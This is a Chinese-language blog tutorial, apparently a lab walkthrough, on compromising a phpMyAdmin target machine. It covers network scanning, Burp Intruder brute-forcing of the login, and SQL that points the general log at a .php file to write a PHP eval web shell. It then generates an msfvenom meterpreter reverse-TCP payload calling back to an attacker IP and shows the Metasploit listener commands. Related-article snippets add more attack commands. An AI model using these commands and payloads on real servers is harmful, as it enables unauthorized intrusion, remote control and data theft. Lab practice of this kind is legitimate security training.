Web渗透测试对靶机注入shell(phpMyAdmin)

最新推荐文章于 2024-07-20 18:10:56 发布
最新推荐文章于 2024-07-20 18:10:56 发布
阅读量3.8k 收藏 11
点赞数 2
分类专栏: phpMyAdimin 文章标签: 前端 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SYJ_361/article/details/121952135
版权

Web渗透测试对靶机注入shell

文章目录

1、寻找目标信息

netdiscover扫描

打开kali,使用root权限,输入命令

netdiscover

image-20211214185824204

目标主机为显示 VMare的IP地址得到目标主机IP地址为:192.168.0.4

nmap扫描

输入命令

nmap -sV -O -T4 192.168.0.4

发现目标主机有端口3306是打开的

image-20211214190022018

利用御剑后台进行扫描

输入域名(就是目标IP地址):192.168.0.4

得到网页地址:phpMyAdmin

image-20211214190130463

网页界面如下

image-20211214190146927

2、对登录页面进行暴力破解

启动burp suite对目标网页进行拦截

image-20211220090649561

对目标进行暴力破解

  • 首先,单击【鼠标右键】–【发送给测试器】–点击【Intruder】
  • 进入intruder界面后,点击【Positions】
  • 然后点击【清除】把变量都清楚了
  • 选中【admin】(username和password)后面的值,单击【添加】,把要进行暴力破解的变量进行添加
  • 下拉攻击类型选中【Clusterbomb】

image-20211220090904268
image-20211219223546375

  • 然后点击【Payload】
  • 有效负载集为1载入Username.txt文件中的数据
  • 有效负载集为2载入Password.txt文件中的数据
  • 然后点击【开始攻击】:程序自动进行暴力破解
  • 匹配用户名和密码
    • 破解得到用户名为:root
    • 密码为:root

image-20211219223904927

image-20211214191553909

image-20211214191602209

3、进入phpmyadmin界面

查看主页信息

image-20211220093336920

对目标信息进行渗透处理

查看日志是否打开
  • 点击【变量】
    • 查看是否开启日志和日志地址

image-20211220091655447

创建日志文件getshell
进入SQL界面
#set global general_log=on; #开启日志
set global general_log_file = 'C:/phpstudy/www/xxb.php'; #设置指定文件为网址日志存放文件
select '<?php @eval($_POST["xxb"]);?>';

下面图片是先前截的图

image-20211220092104020

image-20211214192205996

再次进入【变量】

把general log_file的路径中的文件名换成刚才新建的文件名

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-elVsz80o-1639965105766)(C:/Users/18393/AppData/Roaming/Typora/typora-user-images/image-20211220092324395.png)]

4、用中国蚁剑进行连接

建立连接

注意后缀名和密码

点击测试连接–连接成功–保存这个状态

image-20211220092951504

用kali生成木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.59.134 LPORT=4444 -f exe -o /home/kali/shell.exe
注意

LHOST的IP地址

和/home/kali/shell.exe的路径和文件名

建议把文件名改成自己想的名字

把生成的文件上传到服务器

image-20211214193013840

用kali进行监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.59.134
set lport 4444
run

image-20211214193543801

image-20211214193609301

用中国蚁剑运行程序

image-20211214193706012

去kali看看

入侵成功

image-20211214193754944

5、后渗透阶段

查看当前角色

getuid

最低0.47元/天 解锁文章
小小西贝
关注
专栏目录
渗透测试-KioptrixVM3靶机渗透
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
04-02 2358
1.环境部署 靶机下载地址:https://download.vulnhub.com/kioptrix/KVM3.rar 攻击机:Kali 2019.2 amd64 靶机 : KioptrixVM3靶机 目标:拿下靶机root权限 2.信息收集 使用arp-scan -l进行局域网主机发现 得到靶机IP地址,使用Nmap进行端口扫描 nmap -sV 192.168.227.13...
靶机渗透测试实战(二)——Lazysysadmin渗透实战
橘子女侠
05-09 4717
目录 一. 实验环境 二. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)渗透测试 139,445端口(共享服务) 80端口(Apache服务——http) 22端口(SSH服务) 三. 实验总结 一. 实验环境 靶机:Lazsysadmin,IP地址:暂时未知; 测试机:Kali,IP地址:192.168.37.131; 测试机:物理机w...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
vulnhub——Ai-Web1靶机渗透
最新发布
qq_63034068的博客
07-20 1026
sqlmap -u "http://192.168.0.104/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 -T user --columns #列出字段。sqlmap -u "http://192.168.201.141/se3reTdir777/" --data "uid=1&Operation=Submit" -D aiweb1 --tables #列出表。我们再去扫一下另一个路径,我们看到了一个php文件。
渗透测试靶机渗透Vulnhub-bulldog
SunnyCat
06-01 3137
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
靶机练习 aliens phpmyadminshell date命令提权
hljzzj的博客
01-25 3655
靶机信息 下载地址: https://www.vulnhub.com/entry/hacksudo-aliens,676/ 名称: hacksudo系列ALIENS 靶场: VulnHub.com 难度: 简单 发布时间: 2021年4月4日 提示信息: 无 目标: user.txt和root.txt 实验环境 攻击机:VMware kali 192.168.7.3 靶机:Vbox linux IP自动获取 信息收集 扫描主机 扫描局域网内的靶机IP地址 sudo nmap -.
渗透测试学习之靶机Five86-1
情感博主V
03-21 596
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.147 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.147 2个http端口,80是Apache,10000那个查一下: web站点相关服务信息 80Apache下的站点: 10000端口下的集成环境: 服务信息看不出啥 ...
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(一)Tr0ll
hyjcking的博客
11-20 2346
超级详细的步骤,希望可以为你解决这台靶机提供思路 说实话这个靶机不算难,但是却能比较好的巩固自己的基础知识,期间也遇到了自己不太懂的知识,会做和做的快是有区别的,在渗透这条路上还是任重而道远呐,继续加油
WEB安全基础入门—操作系统命令注入shell 注入
Eason_LYC安全白帽子的成长博客
06-09 2011
WEB安全基础入门—操作系统命令注入shell注入) 欢迎关注订阅专栏! WEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏!......
vulhub渗透测试靶机学习1
08-08
渗透测试靶机学习】 渗透测试靶机安全研究人员和网络安全爱好者用来提升技能和实践渗透测试技巧的模拟环境。在本文中,我们将讨论两个靶机环境:Lampiao 和 Kioptrix Level 1.2 (#3),以及如何对它们进行初步的...
2020最新渗透测试靶机和工具及教程
05-30
搜集的渗透测试的靶场,有Bwapp综合靶场练习 webug综合靶场练习 DVWA综合靶场练习 pikachu靶场练习 uploads文件练习 SQlilabs注入练习 ZVulDirll综合靶场,全部封装在虚拟机中,渗透工具封装在另一虚拟机中。
靶机渗透测试实战(三)——Bulldog1渗透实战
橘子女侠
05-09 3788
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (1)信息收集——主机发现 (2)信息收集——端口扫描 (3)信息收集——操作系统扫描 (4)Web渗透 四. 实验总结 一. 实验环境 靶机:IP地址暂时未知; 测试机:kali IP地址:192.168.37.131 测试机:物理机win7 二. 实验流程 信息收集——主机发现 信息收集——端口扫描 ...
靶机练习-phpmyadmin-getshell
qq_52223347的博客
01-11 582
漏洞利用 找到php后台的管理页面和root密码 getshell 访问http://192.168.0.144/phpmyadmin 弱口令 root/root 登入 两种利用方式 sql查询 利用into outfile直接写入shell文件 很遗憾secure_file_priv的值是NULL,也就是不允许导入导出,如果尝试写入shell文件会失败: show variables like ‘%secure%’ secure_file_priv 是用来限制 load dumpfile、int
靶机渗透测试实战——DC-5
weixin_45116657的博客
10-30 6716
实验环境: 目标机DC-5的IP地址:未知(192.168.85.144) 攻击机kali的IP地址:192.168.85.139 实验步骤: 1、主机扫描,确定目标主机 命令:arp-scan -l 2、端口扫描,确定详细服务 命令1:nmap -sS -Pn -A -p- 192.168.85.144 命令2:nmap -sV -p- 192.168.85.144 #-sV —— 用来扫...
总结分析 | 基于phpmyadmin渗透测试
小司机的奥拓
09-22 3349
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
Phpmyadmin的一次渗透测试
weixin_30715523的博客
06-07 685
首先通过目录扫描对某站进行扫描,发现存在phpmyadmin,尝试弱口令root:root很幸运进去了 尝试使用Navicate进行数据库连接返回禁止远程连接数据库: 但是远程命令执行发现本地3306端口时开放的,于是尝试通过代理进行连接: Navicat安装目录下上传ntunnel_mysql.php文件(数据库的代理脚本)到目标服务器任意web站点目录(后面getsh...
靶机渗透(三)——Lazysysadmin
qq_45751902的博客
04-21 3429
环境配置 都是在vmware中 靶机:未知,nat模式 kali:192.168.92.5 nat,模式 信息收集 arp-scan -l 扫描局域网内所有的ip 从上图可知,靶机的ip是192.168.92.6 端口扫描 nmap -sS -Pn -T4 -sV -O 192.168.92.6 或者 masscan 192.168.92.6 -p 0-65535 --rate=10000 masscan扫描速度快,但准确率不高,多扫描几次,防止漏扫 namp:-T4(分为0-5等级;-s
kali PHP网站渗透,小白日记35:kali渗透测试Web渗透
weixin_39541844的博客
03-11 2048
手动漏洞挖掘即扫描后,如何对发现的漏洞告警进行验证。#默认安装流传linux操作系统比windows系统安全的说法,是因为windows系统默认安装后,会开放很多服务和无用的端口,而且未经过严格安全性的配置,经常有系统服务以最高权限运行。漏洞类型--远程命令执行1、phpMyadmin安装在web服务器中的web接口,专门用来管理MySQL数据库。对于早期版本,安装后若是没有做安全配置,对敏感路径...
secquan phpmyadmin批量爆破工具_kali linux 工具使用之 001 dnsenum
weixin_39710179的博客
11-22 859
相信看过我kali Linux 工具使用之 001 dnsenum这篇文章的朋友已经对 dns 信息在渗透测试中的作用已经清楚了,dns 信息能够暴露一个目标系统的许多信息,往往一个渗透测试项目就是从一个域名开始的,第一步就是获取 dns 信息,然后从 dns 信息中找突破口,发现新的渗透测试路径。相比于 dnsenum,dnsmap 只有字典爆破一个手段来收集目标的 dns 信息,不像 dnse...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值